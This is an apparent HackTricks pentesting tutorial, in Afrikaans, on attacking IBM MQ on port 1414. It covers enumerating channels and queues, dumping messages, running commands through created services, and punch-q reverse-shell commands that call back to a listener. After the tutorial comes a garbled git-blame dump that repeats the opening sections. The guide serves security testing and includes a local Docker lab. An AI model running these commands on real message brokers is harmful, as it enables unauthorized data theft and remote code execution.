hacktricks/network-services-pentesting/1414-pentesting-ibmmq.md

# 1414 - Pentesting IBM MQ

{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Basiese inligting

IBM MQ is 'n IBM tegnologie om boodskap rye te bestuur. Soos ander **boodskap broker** tegnologieë, is dit toegewy aan die ontvang, stoor, verwerk en klassifiseer van inligting tussen produsente en verbruikers.

Standaard, **dit stel IBM MQ TCP poort 1414 bloot**.
Soms kan HTTP REST API blootgestel word op poort **9443**.
Metings (Prometheus) kan ook vanaf TCP poort **9157** verkry word.

Die IBM MQ TCP poort 1414 kan gebruik word om boodskappe, rye, kanale, ... te manipuleer, maar **ook om die instansie te beheer**.

IBM bied 'n groot tegniese dokumentasie beskikbaar op [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq).

## Gereedskap

'n Voorstel gereedskap vir maklike eksploitatie is **[punch-q](https://github.com/sensepost/punch-q)**, met Docker gebruik. Die gereedskap gebruik aktief die Python biblioteek `pymqi`.

Vir 'n meer handmatige benadering, gebruik die Python biblioteek **[pymqi](https://github.com/dsuch/pymqi)**. [IBM MQ afhanklikhede](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) is nodig.

### Installeer pymqi

**IBM MQ afhanklikhede** moet geïnstalleer en gelaai word:

1. Skep 'n rekening (IBMid) op [https://login.ibm.com/](https://login.ibm.com/).
2. Laai IBM MQ biblioteke af van [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc). Vir Linux x86_64 is dit **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**.
3. Decomprimeer (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`).
4. Voer `sudo ./mqlicense.sh` uit om lisensievoorwaardes te aanvaar.

>As jy onder Kali Linux is, wysig die lêer `mqlicense.sh`: verwyder/comments die volgende lyne (tussen lyne 105-110):
>
>```bash
>if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
>  then
>    echo "ERROR: This package is incompatible with this system"
>    echo "       This package was built for ${BUILD_PLATFORM}"
>    exit 1
>fi
>```

5. Installeer hierdie pakkette:
```bash
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
```
6. Voeg dan tydelik die `.so` lêers by LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64`, **voor** jy ander gereedskap gebruik wat hierdie afhanklikhede het.

Dan kan jy die projek [**pymqi**](https://github.com/dsuch/pymqi) kloon: dit bevat interessante kode-snippets, konstantes, ... Of jy kan die biblioteek direk installeer met: `pip install pymqi`.

### Gebruik punch-q

#### Met Docker

Gebruik eenvoudig: `sudo docker run --rm -ti leonjza/punch-q`.

#### Sonder Docker

Kloon die projek [**punch-q**](https://github.com/sensepost/punch-q) en volg dan die readme vir installasie (`pip install -r requirements.txt && python3 setup.py install`).

Daarna kan dit gebruik word met die `punch-q` opdrag.

## Enumerasie

Jy kan probeer om die **queue manager naam, die gebruikers, die kanale en die queues** te enumereer met **punch-q** of **pymqi**.

### Queue Manager

Soms is daar geen beskerming teen die verkryging van die Queue Manager naam nie:
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR
```
### Kanale

**punch-q** gebruik 'n interne (veranderbare) woordlys om bestaande kanale te vind. Gebruik voorbeeld:
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
```
Dit gebeur dat sommige IBM MQ instansies **onaangetekende** MQ versoeke aanvaar, so `--username / --password` is nie nodig nie. Natuurlik kan toegangregte ook verskil.

Sodra ons een kanaalnaam kry (hier: `DEV.ADMIN.SVRCONN`), kan ons al die ander kanale opnoem.

Die opnoeming kan basies gedoen word met hierdie kode-snippet `code/examples/dis_channels.py` van **pymqi**:
```python
import logging
import pymqi

logging.basicConfig(level=logging.INFO)

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

prefix = '*'

args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
response = pcf.MQCMD_INQUIRE_CHANNEL(args)
except pymqi.MQMIError as e:
if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
logging.info('No channels matched prefix `%s`' % prefix)
else:
raise
else:
for channel_info in response:
channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
logging.info('Found channel `%s`' % channel_name)

qmgr.disconnect()

```
... Maar **punch-q** inkorporeer ook daardie deel (met meer inligting!).
Dit kan begin word met:
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...

| Name                 | Type              | MCA UID | Conn Name | Xmit Queue | Description     | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN    | Server-connection |         |           |            |                 |            |
| DEV.APP.SVRCONN      | Server-connection | app     |           |            |                 |            |
| SYSTEM.AUTO.RECEIVER | Receiver          |         |           |            | Auto-defined by |            |
| SYSTEM.AUTO.SVRCONN  | Server-connection |         |           |            | Auto-defined by |            |
| SYSTEM.DEF.AMQP      | AMQP              |         |           |            |                 |            |
| SYSTEM.DEF.CLUSRCVR  | Cluster-receiver  |         |           |            |                 |            |
| SYSTEM.DEF.CLUSSDR   | Cluster-sender    |         |           |            |                 |            |
| SYSTEM.DEF.RECEIVER  | Receiver          |         |           |            |                 |            |
| SYSTEM.DEF.REQUESTER | Requester         |         |           |            |                 |            |
| SYSTEM.DEF.SENDER    | Sender            |         |           |            |                 |            |
| SYSTEM.DEF.SERVER    | Server            |         |           |            |                 |            |
| SYSTEM.DEF.SVRCONN   | Server-connection |         |           |            |                 |            |
| SYSTEM.DEF.CLNTCONN  | Client-connection |         |           |            |                 |            |
```
### Queues

Daar is 'n kode-snippet met **pymqi** (`dis_queues.py`) maar **punch-q** laat toe om meer stukke inligting oor die queues te verkry:
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
Showing queues with prefix: "*"...
| Created   | Name                 | Type   | Usage   | Depth  | Rmt. QM | Rmt. Qu | Description                       |
|           |                      |        |         |        | GR Name | eue Nam |                                   |
|           |                      |        |         |        |         | e       |                                   |
|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 | E                    |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
| 2023-10-1 | DEV.QUEUE.1          | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 |                      |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
| 2023-10-1 | DEV.QUEUE.2          | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 |                      |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
| 2023-10-1 | DEV.QUEUE.3          | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 |                      |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
# Truncated
```
## Exploit

### Dump boodskappe

Jy kan rye(s)/kanaal(e) teiken om boodskappe uit hulle te snuffel / te dump (nie-destructiewe operasie). *Voorbeelde:*
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
```

```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
```
**Moet nie huiwer om op alle geïdentifiseerde rye te iterate nie.**

### Kode-uitvoering

> Sommige besonderhede voordat ons voortgaan: IBM MQ kan op verskeie maniere beheer word: MQSC, PCF, Kontroleopdrag. Sommige algemene lyste kan gevind word in [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison).
> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmeerbare Opdrag Formate***) is waaroor ons fokus om op afstand met die instansie te kommunikeer. **punch-q** en verder **pymqi** is gebaseer op PCF-interaksies.
>
> Jy kan 'n lys van PCF-opdragte vind:
> * [Van PCF dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), en
> * [van konstantes](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes).
>
> Een interessante opdrag is `MQCMD_CREATE_SERVICE` en sy dokumentasie is beskikbaar [hier](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms). Dit neem as argument 'n `StartCommand` wat na 'n plaaslike program op die instansie verwys (voorbeeld: `/bin/sh`).
>
> Daar is ook 'n waarskuwing van die opdrag in die dokumentasie: *"Let op: Hierdie opdrag laat 'n gebruiker toe om 'n arbitrêre opdrag met mqm gesag uit te voer. As regte toegestaan word om hierdie opdrag te gebruik, kan 'n kwaadwillige of onverskillige gebruiker 'n diens definieer wat jou stelsels of data benadeel, byvoorbeeld deur noodsaaklike lêers te verwyder."*
>
> *Nota: altyd volgens IBM MQ dokumentasie (Administrasie Verwysing), is daar ook 'n HTTP-eindpunt by `/admin/action/qmgr/{qmgrName}/mqsc` om die ekwivalente MQSC-opdrag vir dienscreatie (`DEFINE SERVICE`) uit te voer. Hierdie aspek is nog nie hier behandel nie.*

Die dienscreatie / -verwydering met PCF vir afstandprogramuitvoering kan gedoen word deur **punch-q**:

**Voorbeeld 1**
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
```
> In die logs van IBM MQ kan jy lees dat die opdrag suksesvol uitgevoer is:
>
> ```bash
> 2023-10-10T19:13:01.713Z AMQ5030I: Die Opdrag '808544aa7fc94c48' het begin. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
> ```

Jy kan ook bestaande programme op die masjien opnoem (hier `/bin/doesnotexist` ... bestaan nie):
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
s "whatever"
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436

Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done
```
**Wees bewus dat die programontplooi asynchrone is. So jy het 'n tweede item nodig om die uitbuiting te benut** ***(luisteraar vir omgekeerde dop, lêer skep op 'n ander diens, data eksfiltrasie deur netwerk ...)***

**Voorbeeld 2**

Vir 'n maklike omgekeerde dop, **punch-q** bied ook twee omgekeerde dop payloads aan:

* Een met bash
* Een met perl

*Natuurlik kan jy 'n pasgemaakte een bou met die `execute` opdrag.*

Vir bash:
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
Vir perl:
```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
### Custom PCF

Jy kan in die IBM MQ dokumentasie delf en direk die **pymqi** python biblioteek gebruik om spesifieke PCF opdragte te toets wat nie in **punch-q** geïmplementeer is nie.

**Example:**
```python
import pymqi

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
# Replace here with your custom PCF args and command
# The constants can be found in pymqi/code/pymqi/CMQCFC.py
args = {pymqi.CMQCFC.xxxxx: "value"}
response = pcf.MQCMD_CUSTOM_COMMAND(args)
except pymqi.MQMIError as e:
print("Error")
else:
# Process response

qmgr.disconnect()

```
As jy nie die konstante name kan vind nie, kan jy na die [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors) verwys.

> *Voorbeeld vir [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Desimaal = 73). Dit benodig die parameter `MQCA_CLUSTER_NAME` (Desimaal = 2029) wat `*` kan wees (Dok: ):*
>
> ```python
> import pymqi
>
> queue_manager = 'MYQUEUEMGR'
> channel = 'DEV.ADMIN.SVRCONN'
> host = '172.17.0.2'
> port = '1414'
> conn_info = '%s(%s)' % (host, port)
> user = 'admin'
> password = 'passw0rd'
>
> qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
> pcf = pymqi.PCFExecute(qmgr)
>
> try:
>     args = {2029: "*"}
>     response = pcf.MQCMD_REFRESH_CLUSTER(args)
> except pymqi.MQMIError as e:
>     print("Error")
> else:
>     print(response)
>
> qmgr.disconnect()
> ```

## Toetsomgewing

As jy die IBM MQ gedrag en exploits wil toets, kan jy 'n plaaslike omgewing opstel gebaseer op Docker:

1. Om 'n rekening op ibm.com en cloud.ibm.com te hê.
2. Skep 'n gekonteiniseerde IBM MQ met:
```bash
sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
```
Deur standaard is die outentisering geaktiveer, die gebruikersnaam is `admin` en die wagwoord is `passw0rd` (Omgewing veranderlike `MQ_ADMIN_PASSWORD`). Hier is die wagterbestuurder se naam gestel op `MYQUEUEMGR` (veranderlike `MQ_QMGR_NAME`).

Jy moet die IBM MQ aan en loop hê met sy poorte blootgestel:
```bash
❯ sudo docker ps
CONTAINER ID   IMAGE                                COMMAND                  CREATED         STATUS                    PORTS                                                                    NAMES
58ead165e2fd   icr.io/ibm-messaging/mq:9.3.2.0-r2   "runmqdevserver"         3 seconds ago   Up 3 seconds              0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp   testing-ibmmq
```
> Die ou weergawe van IBM MQ docker beelde is by: https://hub.docker.com/r/ibmcom/mq/.

## References

* [mgeeky's gist - "Praktiese IBM MQ Penetrasie Toetsing notas"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
* [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
* [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq)
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								# 1414 - Pentesting IBM MQ
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								{% hint style="success" %}
 								Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								<details>
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								<summary>Ondersteun HackTricks</summary>
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
 								* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
 								</details>
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								{% endhint %}
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								## Basiese inligting
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								IBM MQ is 'n IBM tegnologie om boodskap rye te bestuur. Soos ander **boodskap broker** tegnologieë, is dit toegewy aan die ontvang, stoor, verwerk en klassifiseer van inligting tussen produsente en verbruikers.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Standaard, **dit stel IBM MQ TCP poort 1414 bloot**.
 								Soms kan HTTP REST API blootgestel word op poort **9443**.
 								Metings (Prometheus) kan ook vanaf TCP poort **9157** verkry word.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Die IBM MQ TCP poort 1414 kan gebruik word om boodskappe, rye, kanale, ... te manipuleer, maar **ook om die instansie te beheer**.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								IBM bied 'n groot tegniese dokumentasie beskikbaar op [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq).
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								## Gereedskap
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								'n Voorstel gereedskap vir maklike eksploitatie is **[punch-q](https://github.com/sensepost/punch-q)**, met Docker gebruik. Die gereedskap gebruik aktief die Python biblioteek `pymqi`.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Vir 'n meer handmatige benadering, gebruik die Python biblioteek **[pymqi](https://github.com/dsuch/pymqi)**. [IBM MQ afhanklikhede](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) is nodig.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Installeer pymqi
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								**IBM MQ afhanklikhede** moet geïnstalleer en gelaai word:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+. Skep 'n rekening (IBMid) op [https://login.ibm.com/](https://login.ibm.com/).
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+. Laai IBM MQ biblioteke af van [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc). Vir Linux x86_64 is dit **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**.
 . Decomprimeer (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`).
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+. Voer `sudo ./mqlicense.sh` uit om lisensievoorwaardes te aanvaar.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								>As jy onder Kali Linux is, wysig die lêer `mqlicense.sh`: verwyder/comments die volgende lyne (tussen lyne 105-110):
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								>
 								>```bash
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								>if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
 								>  then
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								>    echo "ERROR: This package is incompatible with this system"
 								>    echo "       This package was built for ${BUILD_PLATFORM}"
 								>    exit 1
 								>fi
 								>```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+. Installeer hierdie pakkette:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```bash
 								sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
 								sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
 								sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+. Voeg dan tydelik die `.so` lêers by LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64`, **voor** jy ander gereedskap gebruik wat hierdie afhanklikhede het.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Dan kan jy die projek [**pymqi**](https://github.com/dsuch/pymqi) kloon: dit bevat interessante kode-snippets, konstantes, ... Of jy kan die biblioteek direk installeer met: `pip install pymqi`.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								### Gebruik punch-q
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								#### Met Docker
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Gebruik eenvoudig: `sudo docker run --rm -ti leonjza/punch-q`.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								#### Sonder Docker
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Kloon die projek [**punch-q**](https://github.com/sensepost/punch-q) en volg dan die readme vir installasie (`pip install -r requirements.txt && python3 setup.py install`).
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Daarna kan dit gebruik word met die `punch-q` opdrag.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								## Enumerasie
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Jy kan probeer om die **queue manager naam, die gebruikers, die kanale en die queues** te enumereer met **punch-q** of **pymqi**.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								### Queue Manager
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Soms is daar geen beskerming teen die verkryging van die Queue Manager naam nie:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```bash
 								❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
 								Queue Manager name: MYQUEUEMGR
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Kanale
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
